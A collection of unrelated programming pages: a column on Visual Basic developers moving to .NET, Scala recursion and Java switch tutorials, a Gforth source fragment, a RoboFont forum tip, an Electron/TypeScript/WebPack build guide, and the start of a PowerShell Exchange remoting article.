The .NET invasion is proceeding a little more slowly than expected, but the all-but-inevitable market penetration continues. Many analysts predict that mainstream development organizations that adopt .NET will do so in time to deploy their first applications in Q3 of 2003. This soon-to-be seismic shift in the Microsoft development community has yet to produce the answer to a critical question for the future of software development—where will all the Visual Basic developers go? Visual Basic has provided a convenient on-ramp into software development for millions of developers. Microsoft found the sweet spot between providing enough power to produce serious applications and isolating the developer from some of the more messy and error-prone elements of Windows and component development. Now, much of that is going to change. With .NET, Microsoft has decided to create a development environment that continues to isolate the developer from platform-specific details, but coders will have to deal with component development. Developers will still be able to carry on without thinking about pointers, memory allocation, or how to create a Windows message handler, but they will no longer be able to ignore component design concepts such as inheritance, namespaces, and method overloading. As .NET moves past the early-adopter stage, Visual Basic developers will have little choice but to transition away from the cocoon that was Visual Basic 6.0. This impending “language shock” has led many commentators to speculate on how Visual Basic developers are going to react. Will they move to Java? Will they go ahead and make the jump to .NET and, if so, will it be C# or Visual Basic .NET? Will they demand that Microsoft continue to support Visual Basic 6.0 and let it remain a distinct development subculture? Will many simply not be able to make the transition and go find jobs in retail, where Java and C++ programmers have thought they should be in the first place? 
I don’t presume to make such predictions. But I do think it’s time to dispel three myths that have sprung up around this question.

Myth #1: .NET is a radical change, so a move to Java would be just as easy

Frank E. Gillett of Forrester Research asserts the following: “For VB programmers—the vast majority of Microsoft shop coders—the leap to .NET programming is just as difficult as migrating to the Java 2 platform. What does this mean? Now is the right time for Microsoft IT shops to reconsider their commitment to Redmond and evaluate the Java 2 and .NET platforms and tools side by side.” This quote should come with a little warning tag that says: “Managers beware—this opinion could cost you a significant amount of unexpected expenditure!” The move from a Microsoft to a Java development organization is a major undertaking. If you look only at the language elements (particularly between Java and C#), you can understand where this idea originated. Certainly, the development and design skills required are similar and equally different from those required for a Visual Basic application. But many more significant factors come into play. The following is just a subset.

Java development environments are nearly always more complicated

The vast array of tools available in the Java environment—arguably one of its great strengths—naturally leads to many new applications and utilities (application servers, IDEs, debugging support applications) that a developer must master. Each new skill has its own learning curve, even if the development is going to be done in a Windows environment. Visual Studio, on the other hand, though much altered, will feel more natural in the hands of Visual Basic programmers. They will know immediately how to set a breakpoint or use code completion features. Making multiple simultaneous transitions—language, toolset, and infrastructure—increases the cost and failure rate of such a migration.
Incremental transition is available with .NET

Most development organizations have some serious deadlines hanging over their heads, and a few months of converting applications and infrastructure is not likely in the project plan. ASP.NET pages can run side-by-side with ASP pages and can share state management mechanisms, whereas the move to JSP is going to require a much wider conversion effort. Mechanisms for calling COM objects from C# and Visual Basic .NET have been explained ad nauseam in articles, books, and conference presentations. Integration with COM+ Services is well documented.

A plethora of "From Visual Basic 6.0" material is available

It has surprised me that very few resources are available that provide a clear path from Visual Basic to Java. Although I have seen some custom training classes for this and a few books (most out of date by now), there seems to be a conspicuous absence of this kind of material. As you would expect, there's a wide array of books describing the transition to Visual Basic .NET and C#, from the perspective of upgrading both code and skill. Developers will make the transition more quickly when reference to what they know is included in training materials.

I suggest the following replacement for the above myth: The move to Java is not as easy as .NET, but if you were considering such a transition, now is the time to decide. The move to .NET is the most significant transition Microsoft has asked Visual developers to make since the beginning of Visual Basic. If you have been thinking about moving to Java, it would certainly make sense to do so before you incur that cost rather than after.

Myth #2: Large numbers of Visual Basic developers are going to move to Java

One of the compelling reasons to move to Java has been removed, namely that Java was light-years ahead of Visual Basic 6.0 in its ability to create large-scale, object-oriented applications.
One could argue that Java is still better for this task, but at least now the question is up for debate. Before .NET, there was no question. Implementing robust object-oriented designs was all but impossible in the Visual environment. ASP was one giant kludge that often led to slow and unmaintainable code. You could write an entire book on Visual Basic and ASP AntiPatterns. Certainly most of those who were going to move to Java because of its technical superiority already have done so. Those who will take .NET as a cue to move to Java will likely be much smaller in number and will be motivated by other factors, such as vendor lock-in and security concerns.

I think the future is relatively bright for VB developers. A percentage of developers will not be able to make the jump into hyper-speed. Visual Basic developers vary widely in their abilities and their development roles. On one end of the spectrum, they have been gluing Excel spreadsheets together and creating single-screen utilities; on the other end they are writing highly distributed e-commerce applications. With some percentage of these developers, their interests, efforts, and abilities will fall somewhere between Visual Basic 6.0 and Visual Basic .NET. Perhaps retail is not their future, but they may move into more supporting roles and leave the ranks of the coders. Most of the rest will move to .NET.

Myth #3: If you are going to move to .NET, you should move to C#

C# currently has the celebrity aura. It’s new, it’s cool, and it’s hot. But other than having C-style syntax, it's essentially the same as Visual Basic .NET. Somehow this has yet to sink in. Here’s a conversation I recently had with a C++ developer who is making the transition to C#:

Coder: “I can’t understand why anyone would learn Visual Basic .NET.”
Me: “Why not?”
Coder: “There are so many things it can’t do that C# can.”
Me: “Really, like what?”
Coder: “Well, VB.NET can’t do attributes.”
Me: “Sure it can.”
Coder: “Oh, it can.
Well, can it do delegates?"
Me: "Yes, it can do that as well."

The stigma still sticks. Dan Appleman does an excellent job of addressing this issue in Visual Basic .NET or C#... Which to Choose?, an e-book available from Amazon.com. Other than the lack of support for operator overloading and XML documentation, Visual Basic .NET has all the power of C#, plus some additional features, such as an always-on background compile that provides full real-time error detection, that should make a C# developer envious.

I submit the following alternative: Since Visual Basic .NET and C# are so similar, the decision can be made on nontechnical issues. Perception may still be a driving force in the job market, and C# is a brand-new arena for developers. Also, third-party tool support may become an issue if Visual Basic .NET gets the snub. C# may be the best choice for many Visual Basic developers, but not because of any inherent technical superiority.

Getting down to the heart of the matter

With those myths out of the way, we can examine further the ramifications .NET is going to have on the future of today's Visual Basic developer. In subsequent columns, I'll recount interviews with former Visual Basic developers and development teams that have made the transition to Java, Visual Basic .NET, or C#. I'll examine the cost of those transitions and what lessons can be learned to minimize the impact on development schedules and budgets.

From VB 6.0 to VB .NET: Are you all VB 6.0 fish in a .NET ocean? Drop us an e-mail or post a comment below.
http://www.techrepublic.com/article/where-will-the-visual-basic-60-developers-go/
Recursion

One does not simply talk about functional programming without saying the word "recursion". The first question I asked myself was: why use recursion? I was bad at mathematics, and I hated coming across recursion. But we can ask the question the other way around: why should we use loops?

Loops are the consequence of iterative design: we go from one step to another. In lower-level languages, we have to define the number of steps we want to run without any real proof that this number is the right one. With recursive calls, you can be sure that you will stop at the end, and you don't need to know the exact number of steps it will take: whatever that number is, you perform your operations at each step and stop when your end condition is hit. Furthermore, as seen in the previous exercise, a higher-order function can use another function and, by extension, itself. Therefore, recursion is a core feature of a pure functional language.

Let's try a simple exercise to refresh our memory: implement a method which returns a list filled with the first x elements of the Fibonacci sequence.

With this first example, we keep every element on the stack to rebuild the full list at the end. We can do better by using tail recursion. Tail recursion is a way to build recursion where we don't need to keep each and every step in order to return the final result: the last thing the function does is call itself. The common way to achieve that is to use an accumulator. An example of tail recursion:

def factorial(n: Int): Int = {
  def iter(x: Int, result: Int): Int =
    if (x == 0) result
    else iter(x - 1, result * x)

  iter(n, 1)
}

Let's try to modify our Fibonacci sequence to be tail recursive. The Scala compiler optimizes tail recursion, so we should definitely use it. One last tip: the @tailrec annotation DOESN'T FORCE TAIL RECURSION.
It only verifies, during compilation, that your function really is tail recursive; if it is not, the compiler reports an error.
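The Fibonacci exercise above can be sketched as follows (a hedged sketch with names of my own choosing, not the playground's reference solution):

```scala
import scala.annotation.tailrec

// Returns the first x elements of the Fibonacci sequence.
// The accumulator `acc` carries the partial result, so the
// recursive call is the last operation performed (tail position).
def fibonacci(x: Int): List[Int] = {
  @tailrec
  def iter(n: Int, a: Int, b: Int, acc: List[Int]): List[Int] =
    if (n == 0) acc.reverse
    else iter(n - 1, b, a + b, a :: acc)

  iter(x, 0, 1, Nil)
}

// fibonacci(5) yields List(0, 1, 1, 2, 3)
```

Because `iter` calls itself in tail position, the compiler can turn it into a loop using constant stack space, unlike a naive version that rebuilds the list on the way back up the call stack.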
https://tech.io/playgrounds/270/functional-programming-explained-to-my-grandma/recursion
Java Switch Case Statement With Simple Program Examples

Today, we are going to learn another topic in our Core Java tutorial series: the switch case statement. If you have not read our previous post about If-Else In Java, you can catch up using that link. Switch case statements are used when several options are available and we need to perform a specific task according to the selection.

How to Use Switch Cases

In Java, the syntax for a switch-case statement looks like this:

switch (variable) {
  case value1:
    statement1;
  case value2:
    statement2;
  case value3:
    statement3;
  ...
  case valuen:
    statementn;
  [default:
    default_statements;]
}

Java Switch Statement Example

package java_Basics;

public class SwitchCase_Example {
  public static void main(String[] args) {
    int i = 2;
    switch (i) {
      case 0:
        System.out.println("i is zero.");
        break;
      case 1:
        System.out.println("i is one.");
        break;
      case 2:
        System.out.println("i is two.");
        break;
      default:
        System.out.println("i is greater than 2.");
    }
  }
}

Output: i is two.

Important Points About Switch Statements

- Case values cannot be duplicated.
- The switch expression and the case values must be of the same data type.
- A case value must be a literal or a constant; you cannot use a variable in a case.
- The break statement is used inside the switch case to terminate the flow of a statement sequence.
- The break statement is optional. If there is no break, execution falls through to the next case.
- The default statement in a switch case is optional and can appear anywhere in the switch block.
- Switch case statements make code more readable by replacing chains of if..else..if statements.
- Switching on a String requires Java 7 or later; on earlier versions it will not compile.
- You can use nested switch statements, which means you can place a switch case statement inside another switch case.
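The fall-through behavior described in the points above can be demonstrated with a small sketch (class and method names are mine, not from the tutorial):

```java
public class FallThroughDemo {
    // Without break, execution continues into the following cases.
    static String describe(int i) {
        StringBuilder sb = new StringBuilder();
        switch (i) {
            case 0:
                sb.append("zero ");
                // no break: falls through to case 1
            case 1:
                sb.append("one ");
                // no break: falls through to case 2
            case 2:
                sb.append("two");
                break; // stops here
            default:
                sb.append("big");
        }
        return sb.toString().trim();
    }

    public static void main(String[] args) {
        System.out.println(describe(0)); // zero one two
        System.out.println(describe(2)); // two
        System.out.println(describe(9)); // big
    }
}
```

Each missing break lets control fall into the next case, which is occasionally useful for grouping values but is more often a source of bugs.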
If you find anything wrong, or want to add more information, write it in the comment section and we will be happy to update the post.
https://www.softwaretestingo.com/java-switch-statement-case/
eliminated all uses of "lit (abort") (s") (.") outside cross.fs, except one
eliminated (c"); cliteral is now in the kernel.

\ quote: S\" and .\" words
\ Copyright (C).

: char/ ; immediate

: parse-num-x ( c-addr1 base -- c-addr2 c )
    base ! 0. rot source chars + over - char/ >number drop rot rot drop ;

: parse-num ( c-addr1 base -- c-addr2 c )
    base @ >r ['] parse-num-x catch r> base ! throw ;

create \-escape-table
  7 c, 8 c, char c c, char d c, 27 c, 12 c, char g c, char h c, char i c,
  char j c, char k c, char l c, char m c, 10 c, char o c, char p c, char q c,
  13 c, char s c, 9 c, char u c, 11 c,

: \-escape ( c-addr1 -- c-addr2 c )
    \ c-addr1 points at a char right after a '\', c-addr2 points right
    \ after the whole sequence, c is the translated char
    dup c@ dup [char] x = if drop char+ 16 parse-num exit endif
    dup [char] 0 [char] 8 within if drop 8 parse-num exit endif
    dup [char] n = if
        \ \-escapes were designed to translate to one character, so
        \ this is quite ugly: copy all but the last char right away
        drop newline 1- 2dup here swap chars dup allot move chars + c@
    else
        dup [char] a [char] w within if
            [char] a - chars \-escape-table + c@
        endif
    endif
    1 chars under+ ;

: \"-parse ( "string"<"> -- c-addr u )
    \G parses string, translating @code{\}-escapes to characters (as in
    \G C). The resulting string resides at @code{here char+}. The
    \G supported @code{\-escapes} are: @code{\a} BEL (alert), @code{\b}
    \G BS, @code{\e} ESC (not in C99), @code{\f} FF, @code{\n} newline,
    \G @code{\r} CR, @code{\t} HT, @code{\v} VT, @code{\"} ",
    \G @code{\}[0-7]+ octal numerical character value, @code{\x}[0-9a-f]+
    \G hex numerical character value; a @code{\} before any other
    \G character represents that character (only ', \, ? in C99).
    here >r >in @ chars source chars over + >r +
    begin ( parse-area R: here parse-end )
        dup r@ < while
        dup c@ [char] " <> while
        dup c@ dup [char] \ =
into \G single characters. See @code{\"-parse} for details.

:noname \"-parse type ;
:noname postpone s\" postpone type ;
interpret/compile: .\" ( compilation 'ccc"' -- ; run-time -- ) \ gforth dot-backslash-quote

q\rs\tu\v" \-escape-table over str= 0= throw
s\" \w\0101\x041\"\\" name wAA"\ str= 0= throw
s\" s\\\" \\" ' evaluate catch 0= throw
[endif]
http://www.complang.tuwien.ac.at/cvsweb/cgi-bin/cvsweb/gforth/quotes.fs?rev=1.6;content-type=text%2Fx-cvsweb-markup;hideattic=0;f=h;only_with_tag=MAIN
Today I learned: resetting the Beam in Space Center

(This is something I posted on Slack, but I figured it might be useful to cross-post here for others.)

I can't get my Space Center "Beam" to show up. This was a problem for me in 4.1 (but earlier as well, maybe) and is still a problem in 4.2.

@ryan helpfully responded with the following code, asking "what's this output?":

from lib.tools.defaults import getDefaultColor
from lib.tools.misc import NSColorToRgba
from mojo.UI import CurrentSpaceCenter

beam_color = NSColorToRgba(getDefaultColor("spaceCenterBeamStrokeColor"))
csc = CurrentSpaceCenter()
print(beam_color)
print(csc.beam())
csc.setBeam(500)

Turns out, my beam was a visible color but set super high:

(0.0, 0.0108, 0.9982, 1.0)
7856

And the setBeam() method fixed that. Thanks, Ryan!

@frederik added to the conversation:

makes me think, of an alt menu title for "Beam": "Reset Beam" which restores the value to the original value (half of the height)

...which is an idea I like! I'm not sure what to tag this, but I guess Feature Request makes sense, as a feature might help others avoid this confusion in the future. After all, I literally went many months without a beam before asking for help, because I figured it was something that was just broken and might be fixed in a future update. 😅 Glad I finally asked, but a "Reset Beam" option could have helped on my most recent serif project!
https://forum.robofont.com/topic/1034/today-i-learned-resetting-the-beam-in-space-center/1
Having spent a few days experimenting with setting up a build process for creating an Electron-based application, I thought I would put together a post describing the setup. First, a disclaimer: this is still a work in progress, and as with everything within the JavaScript world, it seems like there are a thousand ways to do it and this is just one way. Secondly, I am by no means an expert and this is just the process I wanted to create - I am sure there are improvements that can be made and would value suggestions!

So my requirements are:

- Want to use Electron for creating a simple (or not…) desktop application
- Want to use TypeScript for the majority of the code
- Where I have to use JavaScript code, want to have it linted by StandardJS
- Want the TypeScript code to be linted by ts-lint but conforming to consistent rules with StandardJS
- Want to use WebPack (version 2) to control the build process
- Want to use Babel to transpile from ES6 to ES5 as needed for Node, and to compile the JSX
- Want to use React and tsx on the front end
- Want to use the Jest unit testing framework
- Want to have one place to control how TypeScript / TSX is linted and built, one place to control how JavaScript / JSX is linted and built, and one place to run all the tests!

Additional development environment goals:

- Want to have a CI build process hosted within Visual Studio Team Services
- Want to have the code hosted on GitHub
- Be able to run the build and tests within Visual Studio Code

The diagram below shows the end goal for the build process we are going to create.

This guide is probably a bit too long (feels like my longest post in a while!), so if you prefer you can just download the initial project from GitHub.

Importing the packages…

In this guide, I am using yarn, but the same process will work with npm as well.
Let's start by creating an empty project by running the following and completing the wizard:

yarn init

Next, import all the packages we need for the build as development dependencies.

For compiling and linting TypeScript (WebPack, TSLint, TypeScript):

yarn add webpack tslint-config-standard tslint-loader ts-loader tslint typescript -D

For transpiling and linting ES2015 code for Node (Babel, Babel presets, StandardJS):

yarn add babel-core babel-loader babel-preset-es2015-node babel-preset-react standard standard-loader -D

Setting Up The Build Process

In order to set this up, we need to set up a fair few pieces. Let's start by getting the TypeScript process set up to build a file from the src directory to the dist folder. To configure the TypeScript compiler, add a new file called tsconfig.json to the root folder of the project with the following content:

{
  "compileOnSave": false,
  "compilerOptions": {
    "target": "es2015",
    "moduleResolution": "node",
    "pretty": true,
    "newLine": "LF",
    "allowSyntheticDefaultImports": true,
    "strict": true,
    "noUnusedLocals": true,
    "noUnusedParameters": true,
    "sourceMap": true,
    "skipLibCheck": true,
    "allowJs": true,
    "jsx": "preserve"
  }
}

This tells the TypeScript compiler not to compile on save (as we are going to use WebPack) and to be strict (as this is a 'greenfield' project).

In order to set up TSLint to be consistent with StandardJS, add another new file to the root directory called tslint.json with the following content:

{
  "extends": "tslint-config-standard",
  "rules": {
    "indent": [true, "spaces"],
    "ter-indent": [true, 2],
    "space-before-function-paren": ["error", {
      "anonymous": "always",
      "named": "never",
      "asyncArrow": "ignore"
    }]
  }
}

This makes TSLint follow the same configuration as StandardJS. I found the whitespace settings were causing me some errors, hence needing the additional configuration on top of tslint-config-standard.
Next, configure WebPack to compile TypeScript files (ts or tsx extensions) found in the src folder and output to the dist folder. The structure I use here is a little different from the standard, as we will need two parallel configurations when we come to the Electron setup. Create a file called webpack.config.js and add the following:

const path = require('path')

const commonConfig = {
  output: {
    path: path.resolve(__dirname, 'dist'),
    filename: '[name].js'
  },
  module: {
    rules: [
      {
        test: /\.ts$/,
        enforce: 'pre',
        loader: 'tslint-loader',
        options: {
          typeCheck: true,
          emitErrors: true
        }
      },
      {
        test: /\.tsx?$/,
        loader: 'ts-loader'
      }
    ]
  },
  resolve: {
    extensions: ['.js', '.ts', '.tsx', '.jsx', '.json']
  }
}

module.exports = Object.assign(
  {
    entry: { main: './src/main.ts' }
  },
  commonConfig)

The first rule tells WebPack to run tslint as a pre-build step before moving on to the TypeScript compiler. The resolve option adds the TypeScript extensions into WebPack so it will look for both JavaScript and TypeScript files (including JSX or TSX files).

To add the build command to yarn or npm, add the following code to package.json. This assumes you don't have a scripts section already; if you do, merge it in.

"scripts": {
  "build": "webpack --config webpack.config.js"
},

Visual Studio Code Set Up

In order to run this build from within Visual Studio Code, the next step is to configure the task and also set up the workspace environment appropriately. Press Ctrl-Shift-B and then click Configure Build Task. Choose npm as a starting point, and then replace the default tasks array with:

"tasks": [
  {
    "taskName": "build",
    "args": ["run", "build"],
    "isBuildCommand": true
  }
]

If using yarn, then change the command from npm to yarn.
The last part of setting up the editor is to add a settings.json within the .vscode folder (which should have been created for the tasks.json file), specifying the number of spaces and line endings to match the linting settings:

{
  "editor.tabSize": 2,
  "files.eol": "\n"
}

A restart of Visual Studio Code might be required in order for it to pick up these changes.

Testing the build

There are three ways to run the build (and all do the same thing):

- From within the root directory of the project, run yarn run build (or npm run build)
- From within the root directory of the project, run .\node_modules\.bin\webpack
- Press Ctrl-Alt-B within Visual Studio Code

As there is no code yet, running the build will just result in an error. To test the build setup, create a src directory and add a main.ts file with the following content (note the empty line at the end):

export class SimpleClass {
  Add(a: number, b: number): number {
    return a + b
  }
}

const simpleClass: SimpleClass = new SimpleClass()
console.log(simpleClass.Add(2, 3))

If all is working you should get output like:

ts-loader: Using typescript@2.3.3 and D:\Repos\ToDosElectron\tsconfig.json
Hash: c35650ba72c226225609
Version: webpack 2.6.1
Time: 3554ms
Asset    Size     Chunks  Chunk Names
main.js  2.91 kB  0       [emitted]  main
[0] ./src/main.ts 73 bytes {0} [built]

The dist folder should be created and a main.js file should exist. To test this, run node dist/main.js in the root folder. The output should be 5.

Setting Up Babel

Looking at the main.js file, the output is ES2015 style (surrounded by a fair amount of WebPack boilerplate):

class SimpleClass {
  Add(a, b) {
    return a + b;
  }
}
/* harmony export (immutable) */ __webpack_exports__["SimpleClass"] = SimpleClass;

const simpleClass = new SimpleClass();
console.log(simpleClass.Add(2, 3));

The next goal is to use Babel to convert this to fully compatible JavaScript for Node. As of Babel 6, a .babelrc file is used to tell it what 'presets' to load.
The following will tell it to understand both ES2015 and React, and to transpile down as needed for Node:

{
  "presets": ["es2015-node", "react"]
}

WebPack also needs to be told to call Babel. The loader setting in each rule can take an array of loaders, which are applied in reverse order. Replacing loader: 'ts-loader' with loader: ['babel-loader', 'ts-loader'] makes WebPack run the TypeScript code through the TypeScript compiler and then the Babel compiler. After re-running the build, the new main.js will be very similar to the last version but should allow for all ES2015 features:

class SimpleClass {
  Add(a, b) {
    return a + b;
  }
}
exports.SimpleClass = SimpleClass;

const simpleClass = new SimpleClass();
console.log(simpleClass.Add(2, 3));

Having set up Babel for the second step in the TypeScript build, we also need to configure it for compiling JavaScript files. Additionally, StandardJS should be used as a linter for JavaScript files. To do this, add the following two rules to the rules section of webpack.config.js:

{
  test: /\.js$/,
  enforce: 'pre',
  loader: 'standard-loader',
  options: {
    typeCheck: true,
    emitErrors: true
  }
},
{
  test: /\.jsx?$/,
  loader: 'babel-loader'
}

If you also want to target browsers, you could switch from the es2015-node preset to the es2015 preset.

Electron

So far the process above doesn't have any settings to deal with Electron, which adds a few additional complications. The following command will add the core Electron package and the type definitions for Electron and Node. It also adds the HTML WebPack plugin, which I will use to generate a placeholder index.html for the UI side of Electron:

yarn add electron html-webpack-plugin @types/electron @types/node -D

An Electron application consists of two processes:

- Main: This is a NodeJS-based script which serves as the entry point into the application. It is responsible for instantiating the BrowserWindow instances and also manages various application lifecycle events.
- Renderer: This is a Chromium-based browser and is the user interface part of the application. It has the same kind of structure you would expect if you use Chrome: one master process, and each WebView is its own process.

The two processes share some APIs and communicate with each other using interprocess communication. There is a great amount of detail on this in Electron's process post.

As we want to build output for the two processes, we need to adjust the webpack.config.js file to handle this. The two processes need two different target settings - electron-main and electron-renderer. If the configuration file exports an array, then WebPack will interpret each of the objects as parallel build processes. Replace the module.exports section of the configuration with:

const HtmlWebpackPlugin = require('html-webpack-plugin')

module.exports = [
  Object.assign(
    {
      target: 'electron-main',
      entry: { main: './src/main.ts' }
    },
    commonConfig),
  Object.assign(
    {
      target: 'electron-renderer',
      entry: { gui: './src/gui.ts' },
      plugins: [new HtmlWebpackPlugin()]
    },
    commonConfig)
]

This will pick up the main.ts file and compile it as the Electron main process. It will also compile gui.ts to be the Electron renderer process. The HtmlWebpackPlugin will automatically create an index.html that includes a reference to the compiled gui.js. WebPack also defaults to substituting the __dirname variable, which we actually need at runtime within Electron.
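As an aside on the interprocess communication just mentioned, here is a hedged sketch (the channel names are invented for illustration and are not part of this build setup) of how the two processes could talk via Electron's ipcMain and ipcRenderer:

```typescript
// Main process side (e.g. added to main.ts)
import { app, ipcMain } from 'electron'

ipcMain.on('get-app-version', (event) => {
  // Reply on a channel the renderer is listening to
  event.sender.send('app-version', app.getVersion())
})

// Renderer process side (e.g. added to gui.ts)
import { ipcRenderer } from 'electron'

ipcRenderer.on('app-version', (event, version) => {
  console.log(`Running version ${version}`)
})
ipcRenderer.send('get-app-version')
```

The two halves live in different files: the renderer sends a request over one channel, and the main process replies on another.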
This substitution can be stopped by adding a setting to the commonConfig object:

node: {
  __dirname: false
},

Now to put together the main.ts script to create the Electron app and BrowserWindow:

import { app, BrowserWindow } from 'electron'

declare var __dirname: string

let mainWindow: Electron.BrowserWindow

function onReady() {
  mainWindow = new BrowserWindow({
    width: 800,
    height: 600
  })

  const fileName = `${__dirname}/index.html`
  mainWindow.loadURL(fileName)
  mainWindow.on('close', () => app.quit())
}

app.on('ready', () => onReady())
app.on('window-all-closed', () => app.quit())
console.log(`Electron Version ${app.getVersion()}`)

For the UI side, a simple gui.ts writes the Node version out to the document:

document.getElementsByTagName('body')[0].innerHTML = `node Version: ${process.versions.node}`

The last adjustment is to add new tasks to the package.json file. The prestart entry makes start build the project as well:

"prestart": "yarn run build",
"start": "electron ./dist/main.js",

If you run yarn run start, hopefully an Electron window will appear with the Node version displayed in it.

Adding React

In order to move to using TSX (or JSX), we need to add the React packages to the project:

yarn add react react-dom
yarn add @types/react @types/react-dom -D

The entry point for the UI part of the application needs to be switched from gui.ts to gui.tsx. First, change the entry: { gui: './src/gui.ts' }, line in webpack.config.js to entry: { gui: './src/gui.tsx' }, and rename the file to gui.tsx. Replace the content of gui.tsx with:

import React from 'react'
import ReactDOM from 'react-dom'

ReactDOM.render(
  <div>Node version: {process.versions.node}</div>,
  document.getElementsByTagName('body')[0])

Rerunning yarn run start will produce the same result as before, but now we have an Electron-based application written in TypeScript, using React, and built with WebPack!

Unit Tests

The next piece to set up is a unit testing solution.
Sticking with the rule that WebPack should build all the TypeScript, the idea is that the tests are written in TypeScript in a tests directory, compiled into another directory, where Jest then runs the JavaScript output. Again, the first step is to add the additional packages:

yarn add jest jest-junit @types/jest -D

WebPack needs another configuration file to run the tests. In general, the settings should be the same between the two, so by requiring the main webpack.config file, the test config file can use it as a starting point. Create a new config file called webpack.tests.config.js and add the following content:

const webPack = require('./webpack.config')
const fs = require('fs')
const path = require('path')

const readDirRecursiveSync = (folder, filter) => {
  const currentPath = fs.readdirSync(folder).map(f => path.join(folder, f))
  const files = currentPath.filter(filter)

  const directories = currentPath
    .filter(f => fs.statSync(f).isDirectory())
    .map(f => readDirRecursiveSync(f, filter))
    .reduce((cur, next) => [...cur, ...next], [])

  return [...files, ...directories]
}

const getEntries = (folder) =>
  readDirRecursiveSync(folder, f => f.match(/.*(tests|specs)\.tsx?$/))
    .map((file) => {
      return {
        name: path.basename(file, path.extname(file)),
        path: path.resolve(file)
      }
    })
    .reduce((memo, file) => {
      memo[file.name] = file.path
      return memo
    }, {})

module.exports = [
  Object.assign({}, webPack[0], {entry: getEntries('./tests/host/')}),
  Object.assign({}, webPack[0], {entry: getEntries('./tests/gui/')})
].map(s => {
  s.output.path = path.resolve(__dirname, '__tests__')
  return s
})

The getEntries function searches all folders within tests/host and tests/gui for TypeScript files with filenames ending in either tests or specs. This scan process limits the watch functionality of WebPack, as it only scans for files at start-up. Files within tests/host will be built with a target setting of electron-main, and files within tests/gui with electron-renderer.
The output will be built to a __tests__ folder and, as before, will pass through tslint, tsc, and Babel to produce JavaScript files. To add the test command to yarn, add the following to package.json. The pretest stage will build all the test files before running Jest on the result:

"pretest": "webpack --config webpack.tests.config.js",
"test": "jest"

By default, Jest searches for test files within the __tests__ folder, or for any JavaScript file with a filename ending in either spec or test. Adding the configuration below (to package.json) limits Jest to just reading the __tests__ folder. The second part configures jest-junit to write out an XML file containing the test results - this is so Visual Studio Team Services can read the results:

"jest": {
  "testRegex": "/__tests__/.*\\.jsx?",
  "testResultsProcessor": "./node_modules/jest-junit"
},
"jest-junit": {
  "suiteName": "jest tests",
  "output": "./TEST-jest_junit.xml",
  "classNameTemplate": "{classname}-{title}",
  "titleTemplate": "{classname}-{title}",
  "usePathForSuiteName": "true"
}

Finally, create the test directory structure and a couple of placeholder tests. Note the top line in the sample code below; this adds the global variables that Jest declares into TypeScript so the compiler will be happy!

tests/host/host_tests.ts

/// <reference types="jest" />

describe('Host', () => {
  test('PlaceHolderPassingTest', () => {
    expect(1 + 2).toBe(3)
  })
})

tests/gui/gui_tests.ts

/// <reference types="jest" />

describe('GUI', () => {
  test('PlaceHolderFailingTest', () => {
    expect(1 + 2).toBe(4)
  })
})

Running yarn run test will build these two test files and then run Jest on the resulting output. It will also create a TEST-jest_junit.xml file, which is read by Visual Studio Team Services so we get nice test results.

Visual Studio Team Services

Create a new project in Visual Studio Team Services and select build code from an external repository.
Click New Definition and choose either of the NodeJS scripts as a starting point. These are based on top of npm, so it is easy to configure them to build this project. I am sure you could make it use yarn, but for simplicity I have stuck with npm.

First, reconfigure the Get Sources step to get the code from GitHub (you may need to allow pop-ups for the authorization step). It's great how easy it is to integrate with external repositories now within VSTS.

Next, remove the Run gulp task. Add a new npm task after the npm install, with an npm command of run and an argument of test. This will build and run the Jest tests. It needs to continue even if the tests fail, so choose Continue on error within the Control Options section.

In order to make VSTS report the test results, add a new Publish Test Results task. The default configuration of this task will pick up the JUnit-format XML we have configured to be published in the npm test step.

The last step is to run the actual WebPack build, so add another npm command, this time configured to run build.

Finally, switch on the triggers for Continuous Integration and Pull Requests. That is it - a CI process from GitHub into VSTS!

Future Improvements

Since I started writing this, Electron has been updated with support for TypeScript. This doesn't change much, but it does mean you don't need type definitions for Electron and Node. If you have followed these instructions, all you need do is run:

yarn upgrade electron -D
yarn remove @types/electron @types/node -D

Currently, I don't have a good solution for watching tests. While watch mode works fine for the build (run yarn run build -- --watch), the test command set up here doesn't support watching yet. I'll inevitably spend a fair chunk of time mucking around trying to get this bit set up as well, but at present I accept just having to run the command to run my tests.
Primarily to keep this post shorter (well, a little shorter), I haven't gone into much detail on writing the Electron or React side of an application, instead just looking at the build process. I haven't covered packaging or any of the other steps needed for Electron. There is lots more I can add if people are interested. Hopefully, as I experiment and learn more, I will write a few more posts on Electron, as it is a platform I am growing to really like.

This post was also published on my own personal blog - jdunkerley.co.uk
https://blog.scottlogic.com/2017/06/06/typescript-electron-webpack.html
Gain Remote Access to the Get-ExCommand Exchange Command

Dr Scripto

Summary: Learn how to gain access to the Get-ExCommand Exchange command while in an implicit remote Windows PowerShell session.

Hey, Scripting Guy! I liked your idea about connecting remotely to Windows PowerShell on an Exchange server. The problem is that I do not know all of the cmdlet names. When I am using RDP to connect to the Exchange server, there is a cmdlet named Get-ExCommand that I can use to find what I need. But when I use your technique of using Windows PowerShell remoting to connect to the Exchange server, for some reason the Get-ExCommand cmdlet does not work. Am I doing something wrong? Please help.

—JM

Microsoft Scripting Guy, Ed Wilson, is here. Well, it looks like my colleagues in Seattle are starting to dig out from the major snowstorm they received last week. Here in Charlotte, it has been sunny and cool. Of course, Seattle does not get a lot of 100 degrees Fahrenheit (37.7 degrees Celsius) days in the summer. Actually, the temperature is not what is so bad, but rather it is the humidity that is oppressive. A day that is 100 degrees Fahrenheit with 85% humidity makes a good day to spend in the pool, or to spend writing Windows PowerShell scripts whilst hugging an air conditioner. Back when I was traveling, the Scripting Wife and I usually ended up in Australia during our summer (and their winter) - it is our favorite way to escape the heat and the humidity. Thus, fall and winter in Charlotte are among the reasons people move here: to escape the more rugged winters in the north. Anyway…

Yesterday, I wrote a useful function that makes a remote connection to a server running Exchange Server 2010 and brings all of the Exchange commands into the current session. This function uses a technique called implicit remoting.
It is unfortunate that the Get-ExCommand command is not available outside the native Exchange Management Shell, because the Exchange commands are not all that discoverable by using normal Windows PowerShell techniques. For example, I would expect to be able to find the commands via the Get-Command cmdlet, but as is shown here, nothing returns:

PS C:\> Get-Command -Module *exchange*
PS C:\>

The Get-ExCommand cmdlet is actually a function and not a Windows PowerShell cmdlet. In reality, it does not make much difference that Get-ExCommand is not a cmdlet, except that with a function, I can easily use the Get-Content cmdlet to figure out what the command actually accomplishes. The function resides on the Function: drive in Windows PowerShell, and therefore the command to retrieve the content of the Get-ExCommand function looks like this:

Get-Content Function:\Get-ExCommand

The command and its associated output, when run from within the Exchange Management Shell, are shown in the image that follows.

